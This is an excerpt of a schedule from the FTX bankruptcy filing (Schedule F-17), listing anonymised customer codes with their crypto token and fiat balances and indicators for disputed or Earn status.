| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333595 | | USD[10.00] | | |
| 07333596 | | USD[10.00] | | |
| 07333597 | | USD[10.00] | | |
| 07333598 | | USD[10.00] | | |
| 07333599 | | BAT[1], BRZ[3], CUSDT[5], TRX[10], USD[0.01], USDT[2] | | |
| 07333600 | | USD[10.00] | | |
| 07333601 | | AUD[0.00], BAT[0], BRZ[0], BTC[0], CUSDT[1], DOGE[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07333602 | | USD[10.00] | | |
| 07333603 | | USD[10.00] | | |
| 07333604 | | USD[10.00] | | |
| 07333605 | | USD[10.00] | | |
| 07333606 | | USD[0.00] | | |
| 07333607 | | USD[10.00] | | |
| 07333608 | | BRZ[1], CUSDT[2], DOGE[4], SOL[0], TRX[0.49601757], USD[0.01] | | |
| 07333609 | | CUSDT[1], USD[0.00] | | |
| 07333610 | | USD[10.00] | | |
| 07333611 | | BAT[1], CUSDT[1], TRX[3], USD[0.00] | | |
| 07333613 | | USD[10.00] | | |
| 07333614 | | CUSDT[2], USD[0.00], USDT[.00003533] | | |
| 07333616 | | USD[10.00] | | |
| 07333617 | | CUSDT[20], TRX[9], USD[0.00], USDT[1] | | |
| 07333618 | Contingent, Disputed | CUSDT[2], TRX[1], USD[0.00] | | |
| 07333619 | | USD[10.00] | | |
| 07333620 | | USD[10.00] | | |
| 07333622 | | DOGE[0], TRX[4.76881927], USD[0.00] | | |
| 07333623 | | DOGE[4.50652202], USD[0.00] | | |
| 07333624 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01], USDT[1] | | |
| 07333625 | | DOGE[22.87622234], USD[10.00] | | |
| 07333626 | | BAT[50.21324879], BRZ[2], BTC[.01718021], CUSDT[880.42720653], DOGE[2], ETH[1.16734939], ETHW[1.16685903], LTC[.19238175], SOL[7.55315738], TRX[4], USD[0.11] | Yes | |
| 07333627 | | BAT[.98797052], BCH[.00116773], BRZ[4.83146308], BTC[.00001545], CUSDT[2], DOGE[9.41685754], ETH[.00023183], ETHW[.00023183], GRT[1.05038712], LINK[.01769388], LTC[.01087702], PAXG[.00156736], SOL[.02938802], SUSHI[.08136061], TRX[5.98690457], UNI[.03315462], USD[32.53], YFI[.00001136] | | |
| 07333628 | | CUSDT[5], DOGE[1000.42255485], GRT[12.29941486], TRX[203.65559896], USD[4.97] | | |
| 07333629 | | BRZ[7], CUSDT[20], TRX[9], USD[0.00], USDT[1] | | |
| 07333630 | | DOGE[166.75163255], USD[0.00] | Yes | |
| 07333631 | | BTC[.00208166], CUSDT[33], DOGE[137.45990035], ETH[.02420379], ETHW[.02420379], SHIB[217513.89072091], SUSHI[0], TRX[1], USD[0.00] | | |
| 07333632 | | USD[0.00], USDT[0] | | |
| 07333633 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07333634 | | ETH[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07333635 | | BTC[0], CUSDT[1], DOGE[2], GRT[1], TRX[1], USD[0.00] | | |
| 07333637 | | DOGE[.00045486], TRX[1], USD[0.00] | | |
| 07333638 | | BAT[11.87719437], CUSDT[1], DOGE[.00095941], USD[30.22] | | |
| 07333639 | | CUSDT[4], DOGE[1403.39983604], USD[0.00] | | |
| 07333640 | | USD[10.00] | | |
| 07333641 | | DOGE[739.69049072], USD[0.00] | | |
| 07333642 | | GRT[5.46595554], USD[0.00] | | |
| 07333643 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07333644 | | USD[10.00] | | |
| 07333645 | | DOGE[.21792577], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07333646 | | BRZ[1], CUSDT[1], DOGE[2], ETH[.14092615], ETHW[.14092615], USD[0.21] | | |
| 07333647 | | SUSHI[0], TRX[1], USD[90.31] | | |
| 07333648 | | USD[10.00] | | |
| 07333649 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07333650 | | USD[0.05], USDT[0] | | |
| 07333651 | | DOGE[.0281335], USD[0.00] | | |
| 07333652 | | CUSDT[1], SUSHI[.00010887], TRX[1], USD[0.00] | | |
| 07333653 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07333654 | | USD[10.00] | | |
| 07333656 | | CUSDT[1], USD[0.00] | | |
| 07333657 | | TRX[5.21352], USD[0.00] | | |
| 07333658 | | USD[10.00] | | |

West Realm Shires Services Inc.

Case 22-11068-JTD   Doc 1752   Filed 06/27/23   Page 296 of 1316

22-11071 (JTD)

In re FTX Trading Ltd., et al. Schedule F-17: Non-priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333659 | | USD[10.00] | | |
| 07333661 | | USD[10.00] | | |
| 07333662 | | USD[10.00] | | |
| 07333663 | | USD[10.00] | | |
| 07333664 | | USD[0.00] | | |
| 07333665 | | DOGE[1], USD[0.01] | | |
| 07333666 | | USD[10.00] | | |
| 07333668 | | USD[10.00] | | |
| 07333670 | | USD[10.00] | | |
| 07333671 | | USD[10.00] | | |
| 07333672 | | USD[10.00] | | |
| 07333673 | | USD[10.00] | | |
| 07333674 | | USD[10.00] | | |
| 07333675 | | USD[10.00] | | |
| 07333676 | | USD[10.00] | | |
| 07333678 | | USD[10.00] | | |
| 07333679 | | DOGE[1], USD[0.78] | | |
| 07333680 | | USD[10.99] | Yes | |
| 07333681 | | CUSDT[9], DOGE[2], SOL[0], USD[0.01] | Yes | |
| 07333682 | | BTC[0], DOGE[0], LINK[0] | | |
| 07333684 | | CUSDT[474.77714565], TRX[168.40661575], USD[10.00] | | |
| 07333685 | | USD[10.00] | | |
| 07333687 | | DOGE[.05707385], USD[0.00] | | |
| 07333688 | | USD[10.00] | | |
| 07333689 | | USD[10.00] | | |
| 07333690 | | USD[10.00] | | |
| 07333691 | | USD[10.00] | | |
| 07333692 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07333693 | | USD[10.00] | | |
| 07333694 | Contingent, Disputed | USD[10.00] | | |
| 07333695 | | BAT[1], BRZ[1], CUSDT[5], DOGE[16523.1581045], TRX[1], USD[0.00] | | |
| 07333697 | | DOGE[17.45246019], USD[0.00] | | |
| 07333698 | | DOGE[1.79049868], USD[0.01] | | |
| 07333699 | | USD[10.00] | | |
| 07333700 | | CUSDT[594.25362363], DOGE[1], TRX[2], USD[0.00] | | |
| 07333701 | | USD[10.00] | | |
| 07333702 | | USD[10.00] | | |
| 07333703 | | DOGE[.02340627], USD[0.00], USDT[0] | Yes | |
| 07333704 | | CUSDT[2], DOGE[1], TRX[3], USD[0.00] | | |
| 07333705 | | CUSDT[1], TRX[1], USD[0.39] | Yes | |
| 07333706 | | DOGE[.00413137], USD[0.12], USDT[.00440806] | | |
| 07333707 | | USD[10.00] | | |
| 07333709 | | USD[29.65] | | |
| 07333710 | | BTC[0], USD[0.00] | Yes | |
| 07333712 | | DOGE[1], USD[0.00] | | |
| 07333713 | | DOGE[1], LTC[0], USD[0.00] | | |
| 07333715 | | USD[10.00] | | |
| 07333716 | | GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07333717 | | DOGE[124.76246785], USD[0.00] | | |
| 07333718 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07333719 | | USD[10.00] | | |
| 07333720 | | BRZ[0], DOGE[5.20277418], USD[0.00], USDT[0] | | |
| 07333721 | | USD[10.00] | | |
| 07333722 | | CUSDT[41.64843327], DOGE[1.00002606], USD[0.01] | Yes | |
| 07333723 | | USD[10.00] | | |
| 07333724 | | CUSDT[1], DOGE[17.45867704], USD[0.00], USDT[0] | | |
| 07333726 | | USD[10.00] | | |
| 07333727 | | CUSDT[1], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333728 | | USD[10.00] | | |
| 07333729 | | USD[10.00] | | |
| 07333730 | | BRZ[1], CUSDT[4], DOGE[355.59933918], TRX[1], USD[0.00] | | |
| 07333731 | | USD[10.00] | | |
| 07333732 | | USD[10.00] | | |
| 07333733 | | USD[0.00] | | |
| 07333734 | | USD[10.00] | | |
| 07333735 | | CUSDT[2], SOL[11.5907368], TRX[4], USD[0.00], USDT[1] | | |
| 07333737 | | BTC[.000049], SHIB[305343.97224678], USD[0.04] | | |
| 07333738 | | USD[2.03] | | |
| 07333739 | | USD[10.00] | | |
| 07333740 | | CUSDT[1], DOGE[3390.26334315], USD[10.00] | | |
| 07333741 | | USD[10.00] | | |
| 07333742 | | USD[10.00] | | |
| 07333743 | | CUSDT[4], DOGE[0], TRX[1], USD[0.00], USDT[0] | | |
| 07333744 | | BAT[.00000922], BTC[0.00009982], ETH[.00000001], SHIB[13083139.53186467], USD[0.00] | Yes | |
| 07333745 | | CUSDT[2], SHIB[144916.54195608], TRX[54.06566547], USD[1.40] | Yes | |
| 07333746 | | CUSDT[1], USD[0.00] | Yes | |
| 07333747 | | USD[10.00] | | |
| 07333748 | | USD[0.98] | | |
| 07333749 | | BAT[12.31009847], BRZ[1], CUSDT[7], TRX[5], USD[0.00], USDT[2] | | |
| 07333750 | | BAT[1], CUSDT[4], DOGE[.84131814], USD[0.34] | | |
| 07333751 | | DOGE[2], TRX[1], USD[0.34] | | |
| 07333752 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[25], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |
| 07333753 | | CUSDT[1], DOGE[.92338426], USD[0.01] | | |
| 07333754 | | BRZ[2], DOGE[1.00002145], TRX[3], USD[271.41] | | |
| 07333755 | | DOGE[.00000034], LINK[0], USD[0.00] | | |
| 07333756 | | BRZ[1], MATIC[0], TRX[227.74803195], USD[0.00] | Yes | |
| 07333757 | | BRZ[1], USD[0.00] | | |
| 07333758 | | DOGE[.32549328], TRX[1], USD[0.00] | | |
| 07333759 | | USD[10.00] | | |
| 07333760 | | DOGE[590.66627542], USD[10.00] | | |
| 07333761 | | USD[10.00] | | |
| 07333762 | | CUSDT[2], DOGE[67.64818892], ETH[0.01482219], ETHW[0.01464152], TRX[382.34616444], USD[0.00] | Yes | |
| 07333763 | | USD[10.00] | | |
| 07333764 | | BAT[1], CUSDT[2], DOGE[1], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07333765 | | DOGE[1.00354985], TRX[1], USD[0.00] | | |
| 07333766 | | BRZ[0], CUSDT[1], DOGE[.00001012], USD[0.00] | | |
| 07333767 | | CUSDT[1], DOGE[730.09470145], USD[0.00] | | |
| 07333768 | | USD[10.00] | | |
| 07333769 | | USD[10.00] | | |
| 07333770 | | USD[10.00] | | |
| 07333771 | | DOGE[2656.40264227], TRX[1], USD[0.00] | | |
| 07333772 | | USD[10.00] | | |
| 07333773 | | USD[10.00] | | |
| 07333774 | | CUSDT[2], DOGE[1], TRX[4], USD[0.01] | | |
| 07333776 | | DOGE[968.03857765], TRX[1], USD[0.36] | | |
| 07333777 | | CUSDT[1], DOGE[0], TRX[1], USD[101.58] | Yes | |
| 07333779 | | USD[10.00] | | |
| 07333780 | | BAT[.00012124], BF_POINT[200], BRZ[4], CUSDT[4], GRT[.00001965], TRX[1.00004159], USD[0.00] | | |
| 07333781 | | DOGE[1], USD[32.13] | | |
| 07333782 | | USD[10.00] | | |
| 07333783 | | CUSDT[1], DOGE[141.21983002], USD[0.00] | | |
| 07333784 | | BRZ[1], CUSDT[4], DOGE[1], TRX[1], USD[0.01] | | |
| 07333785 | | USD[10.00] | | |
| 07333786 | | USD[10.00] | | |
| 07333787 | | USD[10.00] | | |
| 07333788 | | BRZ[2], CUSDT[3], DOGE[14391.98306577], GRT[56.46477958], SUSHI[5.5139822], TRX[4298.95219645], USD[0.09], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333789 | | BTC[0.00041824], CUSDT[2], DOGE[2], ETH[.03390581], ETHW[.03390581], USD[0.00] | | |
| 07333790 | | USD[0.00] | | |
| 07333791 | | USD[0.00], USDT[0] | Yes | |
| 07333792 | | BRZ[5], BTC[.00151714], CUSDT[90.32423685], DOGE[430.25031565], ETH[.03879288], ETHW[.03831408], SHIB[339931.83985941], TRX[13.20736649], USD[1104.28] | Yes | |
| 07333793 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07333794 | | CUSDT[2], DOGE[34.83871661], ETH[0], TRX[1], USD[0.00] | | |
| 07333796 | | USD[10.00] | | |
| 07333797 | | DOGE[5400] | | |
| 07333799 | | USD[10.00] | | |
| 07333800 | | SHIB[169737.55390379], USD[0.00] | Yes | |
| 07333801 | | USD[10.00] | | |
| 07333802 | | USD[0.00] | | |
| 07333803 | | USD[10.00] | | |
| 07333804 | | USD[0.00], USDT[0] | | |
| 07333805 | | USD[10.00] | | |
| 07333806 | | DOGE[0], USD[0.00] | Yes | |
| 07333807 | | USD[0.01] | | |
| 07333808 | | USD[0.01] | | |
| 07333809 | | BTC[.00047688], CUSDT[2], DOGE[840.16636325], SUSHI[.84094734], USD[0.00] | Yes | |
| 07333810 | | USD[10.00] | | |
| 07333811 | | CUSDT[4], DOGE[.00907777], ETH[.00096451], ETHW[.00096451], SUSHI[2.72578441], USD[0.16] | | |
| 07333812 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.29] | | |
| 07333813 | | DOGE[28.561061], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07333815 | | USD[10.00] | | |
| 07333816 | | BRZ[2], CUSDT[5], DOGE[238.30177642], TRX[2], USD[0.00] | | |
| 07333817 | | USD[10.00] | | |
| 07333818 | | DOGE[1], USD[0.01] | | |
| 07333819 | | USD[10.00] | | |
| 07333820 | | CUSDT[2], ETH[.00533506], ETHW[.00533506], USD[0.00] | | |
| 07333822 | | BRZ[2], CUSDT[9], GRT[1], SUSHI[1], TRX[5], USD[0.01], USDT[1] | | |
| 07333823 | | AVAX[4.5008631], CUSDT[1], DOGE[4], MATIC[0], NEAR[.00020984], SHIB[12], TRX[4], UNI[9.71823446], USD[0.00] | Yes | |
| 07333824 | | USD[10.00] | | |
| 07333825 | | CUSDT[4], SHIB[1], TRX[1], USD[0.00] | | |
| 07333826 | Contingent, Disputed | USD[0.00] | | |
| 07333827 | | USD[10.00] | | |
| 07333828 | | USD[10.00] | | |
| 07333829 | | USD[10.00] | | |
| 07333830 | | USD[10.00] | | |
| 07333831 | | BRZ[4], CUSDT[4], DOGE[.27340326], GRT[1], TRX[3], USD[0.00] | | |
| 07333832 | | USD[10.00] | | |
| 07333834 | | DOGE[1369.03881757], USD[10.96] | Yes | |
| 07333835 | | USD[10.00] | | |
| 07333836 | | DOGE[.77009044], USD[0.00] | | |
| 07333837 | | USD[10.00] | | |
| 07333838 | | USD[10.99] | Yes | |
| 07333839 | | BAT[1.26918446], CUSDT[11], DOGE[1.89826738], GRT[1.13462824], LINK[.04655973], MATIC[.03574018], SHIB[3], SOL[.00001056], TRX[1.00001328], USD[570.25] | | |
| 07333840 | | USD[10.00] | | |
| 07333841 | | BAT[1], BRZ[3], CUSDT[6], DOGE[9500.83089461], LINK[10.7417007], LTC[3.89958623], TRX[498.69576688], UNI[13.24676543], USD[0.00], USDT[1] | | |
| 07333842 | | USD[10.00] | | |
| 07333843 | | USD[10.00] | | |
| 07333844 | | BTC[.00094055], CUSDT[2], DOGE[417.29953498], USD[0.00] | Yes | |
| 07333845 | | USD[10.00] | | |
| 07333846 | | USD[10.00] | | |
| 07333847 | | TRX[0], USD[0.00] | | |
| 07333848 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07333849 | | USD[10.00] | | |
| 07333851 | | CUSDT[2], DOGE[106.4477646], USD[0.01] | | |
| 07333854 | | BRZ[1], DOGE[480.0724425], USD[7.82] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333855 | | BTC[.00016205], CUSDT[3], DOGE[322.40197308], ETH[.01197525], ETHW[.01182466], SHIB[165977.54245876], USD[0.86] | Yes | |
| 07333856 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07333857 | | BRZ[2], CUSDT[2], GRT[1], USD[0.00] | | |
| 07333858 | | ETH[.00296072], ETHW[.00296072], USD[0.00] | | |
| 07333859 | | BCH[.00998928], USD[0.00] | Yes | |
| 07333860 | | BRZ[1], CUSDT[3], DOGE[19367.76856697], GRT[1], TRX[12213.76283437], USD[10.58] | | |
| 07333862 | | USD[10.00] | | |
| 07333863 | | USD[10.00] | | |
| 07333864 | | BAT[.00004362], BRZ[1], CUSDT[2], DOGE[.66279021], TRX[1], USD[0.01] | | |
| 07333865 | | DOGE[1], USD[0.00] | Yes | |
| 07333866 | | USD[10.00] | | |
| 07333867 | | CUSDT[4], DOGE[.00019035], TRX[1], USD[0.01] | | |
| 07333868 | | USD[10.00] | | |
| 07333869 | | USD[0.15] | | |
| 07333872 | | DOGE[1077.46595151], USD[10.00] | | |
| 07333875 | | USD[10.00] | | |
| 07333876 | | DOGE[31.12110319], USD[0.00] | | |
| 07333877 | | CUSDT[1], DOGE[.00003082], USD[0.00] | | |
| 07333878 | | USD[0.07] | Yes | |
| 07333879 | | DOGE[2509.15205908], USD[0.00] | | |
| 07333880 | | GRT[4.2265384], USD[0.00] | | |
| 07333881 | | CUSDT[3], SOL[.07512771], USD[0.00] | Yes | |
| 07333882 | | BTC[.00790834], CUSDT[3], DOGE[1], TRX[2], USD[0.20] | | |
| 07333884 | | USD[10.00] | | |
| 07333885 | | USD[10.00] | | |
| 07333886 | | BRZ[6.58774479], CUSDT[1], DOGE[1], ETH[0], SOL[0], TRX[14.39894955], USD[0.00], USDT[1.10546304] | Yes | |
| 07333887 | | CUSDT[1], USD[0.01] | | |
| 07333888 | | USD[10.00] | | |
| 07333889 | | USD[0.01] | | |
| 07333890 | | USD[10.00] | | |
| 07333891 | | BAT[1.0165555], BRZ[3], BTC[.00802918], CUSDT[1], DOGE[29024.71792275], GRT[3.16289813], SHIB[8403607.91324491], TRX[4], USD[0.00], USDT[4.39937661] | Yes | |
| 07333892 | | BTC[.00002553], CUSDT[264.46771584], DOGE[819.16991071], GRT[1.00498957], SHIB[144325.00690959], SOL[1.07390985], USD[0.01] | Yes | |
| 07333893 | | CUSDT[5], DOGE[200.92367936], SHIB[279602.96379141], TRX[1.00305744], USD[0.25] | | |
| 07333894 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07333895 | | USD[10.00] | | |
| 07333896 | | BTC[.00023773], USD[0.00] | Yes | |
| 07333897 | | USD[10.00] | | |
| 07333898 | | USD[10.00] | | |
| 07333899 | | USD[10.00] | | |
| 07333900 | | USD[10.00] | | |
| 07333901 | | BRZ[1], CUSDT[7], DOGE[.57483893], TRX[3], USD[0.08] | | |
| 07333902 | | CUSDT[1], DOGE[0.00796165], ETH[0], ETHW[0.00377666], USD[0.00] | Yes | |
| 07333903 | | USD[0.01] | | |
| 07333904 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], GRT[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07333905 | | BRZ[2], DOGE[1], TRX[2], USD[10.52] | Yes | |
| 07333906 | | BRZ[0], GRT[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07333907 | | USD[10.00] | | |
| 07333908 | | USD[10.00] | | |
| 07333909 | | USD[0.00] | | |
| 07333910 | | USD[10.00] | | |
| 07333911 | | DOGE[1], USD[0.00] | | |
| 07333912 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07333913 | | BRZ[0], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07333914 | | BRZ[1], BTC[0.00370908], CUSDT[2], DOGE[2], ETH[0.02063614], ETHW[0.02063614], TRX[906.95132657], USD[0.00] | | |
| 07333915 | | USD[0.05] | | |
| 07333916 | | DOGE[34.66804377], TRX[1], USD[0.00] | | |
| 07333917 | | CUSDT[2], USD[0.06] | | |
| 07333918 | | DOGE[1363.06982855], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333919 | | USD[10.00] | | |
| 07333920 | | DAI[9.89069564], USD[0.00] | | |
| 07333921 | | USD[10.00] | | |
| 07333922 | | TRX[1], USD[0.01] | | |
| 07333923 | | USD[10.00] | | |
| 07333924 | | BRZ[1], CUSDT[5], DOGE[3930.26075187], GRT[1], TRX[3], USD[0.01] | | |
| 07333926 | | USD[10.00] | | |
| 07333927 | | USD[10.00] | | |
| 07333929 | | USD[10.00] | | |
| 07333930 | | BTC[.04579606], CUSDT[2], DOGE[16926.79257948], ETH[.4589311], ETHW[.4589311], TRX[1], USD[0.01], USDT[1] | | |
| 07333931 | | USD[10.00] | | |
| 07333932 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07333933 | | USD[10.00] | | |
| 07333934 | | DOGE[1.43908392], USD[0.00] | | |
| 07333936 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07333938 | | BRZ[1], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07333939 | | USD[0.00], USDT[0] | | |
| 07333940 | | USD[472.48], USDT[0.00000001] | Yes | |
| 07333941 | | LINK[.30734634], USD[0.00] | | |
| 07333942 | | BAT[5], BRZ[2], TRX[7], USD[2.43], USDT[1] | | |
| 07333943 | | USD[10.00] | | |
| 07333944 | | CUSDT[2], USD[0.00] | | |
| 07333945 | | TRX[2], USD[0.00] | | |
| 07333947 | | USD[0.00], USDT[0.00000001] | | |
| 07333948 | | USD[10.00] | | |
| 07333949 | | USD[10.00] | | |
| 07333950 | | USD[10.00] | | |
| 07333951 | | USD[10.00] | | |
| 07333952 | | BAT[1], BRZ[0.00128041], BTC[0], CUSDT[1], DOGE[1], ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0.00043085] | | |
| 07333953 | | BCH[.00931502], SOL[.58775243], USD[0.00] | | |
| 07333954 | | USD[10.00] | | |
| 07333955 | | DOGE[6.02237935], USD[0.00] | Yes | |
| 07333956 | | BRZ[1], BTC[.00000711], CUSDT[2], DOGE[.94571186], TRX[1], USD[0.00] | | |
| 07333957 | | USD[0.00] | | |
| 07333958 | | USD[10.00] | | |
| 07333959 | | USD[0.01], USDT[0] | | |
| 07333960 | | USD[10.00] | | |
| 07333961 | | DAI[9.9624139], USD[0.00] | | |
| 07333962 | | USD[10.00] | | |
| 07333963 | | DOGE[336.98382105], SHIB[3070.3556299], USD[0.00] | | |
| 07333964 | | CUSDT[2], DOGE[1], ETH[0], LINK[20.53288958], MATIC[292.41496746], TRX[1], USD[0.00] | Yes | |
| 07333965 | | CUSDT[3], DOGE[0], USD[0.00] | Yes | |
| 07333966 | | USD[10.00] | | |
| 07333967 | | BRZ[0], CUSDT[3], DAI[.00004379], DOGE[0.00003797], ETH[.00022594], ETHW[.00022594], GBP[0.00], SOL[.00003245], SUSHI[0], USD[0.56], USDT[0.00000001] | Yes | |
| 07333968 | | DOGE[2.00000672], SOL[.00003568], USD[41.88] | | |
| 07333969 | | USD[10.00] | | |
| 07333970 | | BCH[0], DOGE[0], ETH[0], ETHW[0.68123438], USD[252.20] | | |
| 07333971 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07333972 | | USD[10.00] | | |
| 07333973 | | DOGE[1], USD[0.00] | | |
| 07333974 | | BRZ[1], CUSDT[1], DOGE[.00265648], TRX[1], USD[0.00] | | |
| 07333976 | | DOGE[111.0298989], USD[0.00] | | |
| 07333977 | | USD[0.00] | | |
| 07333978 | | CUSDT[4], DOGE[1], TRX[4], USD[0.00] | | |
| 07333979 | | USD[0.00] | | |
| 07333980 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07333981 | | USD[10.00] | | |
| 07333982 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], GRT[1], TRX[2], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07333984 | | CUSDT[1], USD[0.59] | | |
| 07333985 | | USD[0.00] | | |
| 07333986 | | BTC[.00000001], CUSDT[3.0000132], DOGE[0], ETH[.00000001], ETHW[.00000001], TRX[2], USD[0.00] | | |
| 07333987 | | DOGE[28.57305408], USD[0.00] | | |
| 07333988 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07333989 | | USD[0.00] | | |
| 07333990 | | USD[10.00] | | |
| 07333991 | | USD[11.05] | Yes | |
| 07333992 | | DOGE[14.90061942], USD[0.00] | | |
| 07333993 | | USD[10.00] | | |
| 07333995 | | BRZ[1], CUSDT[12], DOGE[2226.78907451], SHIB[286864.98730011], TRX[112.30699731], USD[0.01], USDT[1.09635434] | Yes | |
| 07333996 | | DOGE[1], USD[0.00] | | |
| 07333997 | | DOGE[1], SHIB[3668882.36760360], USD[0.00] | | |
| 07333998 | | USD[10.00] | | |
| 07333999 | | USD[10.00] | | |
| 07334001 | | USD[10.00] | | |
| 07334002 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07334003 | | BAT[1], BRZ[1], CUSDT[1], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07334004 | | BRZ[2], CUSDT[1], DOGE[963.30800589], TRX[1], USD[0.00] | | |
| 07334005 | | SHIB[1285.90132556], USD[0.00] | Yes | |
| 07334006 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07334007 | | BRZ[1], CUSDT[4], DOGE[411.34497749], SUSHI[19.35986499], TRX[5], USD[0.00] | | |
| 07334008 | | AUD[0.00], BTC[0], USD[0.00] | | |
| 07334009 | | DOGE[261.52843371], SHIB[1], USD[0.00] | Yes | |
| 07334010 | | BTC[.00001345], DOGE[0.72800000], ETH[0], USD[0.95] | | |
| 07334011 | | USD[10.00] | | |
| 07334012 | | BRZ[1], CUSDT[1], DOGE[.00004612], GRT[1], TRX[2], USD[843.56] | | |
| 07334013 | | USD[10.00] | | |
| 07334014 | | CUSDT[2], DOGE[783.9148658], USD[0.00] | Yes | |
| 07334015 | | USD[10.00] | | |
| 07334016 | | DOGE[5], USD[327.44] | | |
| 07334017 | | DOGE[45.45750619], USD[0.00] | Yes | |
| 07334018 | | USD[10.00] | | |
| 07334020 | | CUSDT[1], DOGE[.38732047], USD[0.00] | | |
| 07334022 | | USD[10.00] | | |
| 07334023 | | USD[0.01] | | |
| 07334024 | | USD[0.36] | | |
| 07334025 | | BAT[35.61379351], BCH[.07039152], BRZ[2], BTC[.00196193], DOGE[329.63686879], ETH[.00950592], ETHW[.0093828], KSHIB[1246.75196351], LINK[1.52103297], LTC[.20788307], SHIB[2177828.4814341], SOL[.22655733], SUSHI[6.45786368], TRX[26.46792287], USD[66.80], YFI[.00195816] | Yes | |
| 07334026 | | USD[20.00] | | |
| 07334027 | | BRZ[2], CUSDT[2], GRT[1.00498957], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07334028 | | BAT[1.0165555], BRZ[1], USD[0.01] | Yes | |
| 07334029 | | USD[10.00] | | |
| 07334030 | | USD[0.10] | | |
| 07334031 | | USD[10.00] | | |
| 07334032 | | DOGE[25.22984706], USD[0.00] | | |
| 07334033 | | CUSDT[470.33647352], DOGE[1.00000674], TRX[.00001252], USD[2.31] | | |
| 07334034 | | USD[10.00] | | |
| 07334035 | | USD[0.00] | | |
| 07334036 | | BRZ[1], CUSDT[2], DOGE[0.00287900], USD[0.00], USDT[0.00000001] | Yes | |
| 07334038 | | BRZ[3], CUSDT[18], DOGE[1], TRX[8], USD[0.01], USDT[1] | | |
| 07334039 | | DOGE[16.20909341], USD[0.00] | | |
| 07334040 | | BRZ[1], DOGE[7289.53551239], USD[0.00] | | |
| 07334041 | | USD[10.00] | | |
| 07334043 | | USD[10.00] | | |
| 07334044 | | BRZ[2], CUSDT[3], DOGE[20675.77814334], TRX[2], USD[0.00] | Yes | |
| 07334045 | | USD[10.00] | | |
| 07334046 | | BAT[1.0165555], BRZ[1], BTC[.00000024], CUSDT[7], DOGE[1.00128883], LTC[.00853054], TRX[2], USD[0.12], USDT[0] | Yes | |
| 07334047 | | BTC[.00000223], DOGE[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07334048 | | USD[10.00] | | |
| 07334049 | | USD[10.00] | | |
| 07334050 | | USD[10.00] | | |
| 07334051 | | USD[10.00] | | |
| 07334052 | | USD[10.00] | | |
| 07334054 | | SHIB[1], USD[0.39] | | |
| 07334055 | | USD[10.00] | | |
| 07334056 | | USD[10.00] | | |
| 07334057 | | USD[10.00] | | |
| 07334058 | | USD[10.00] | | |
| 07334059 | | BTC[.01236515], CUSDT[1], DOGE[17121.72970352], USD[1581.13] | | |
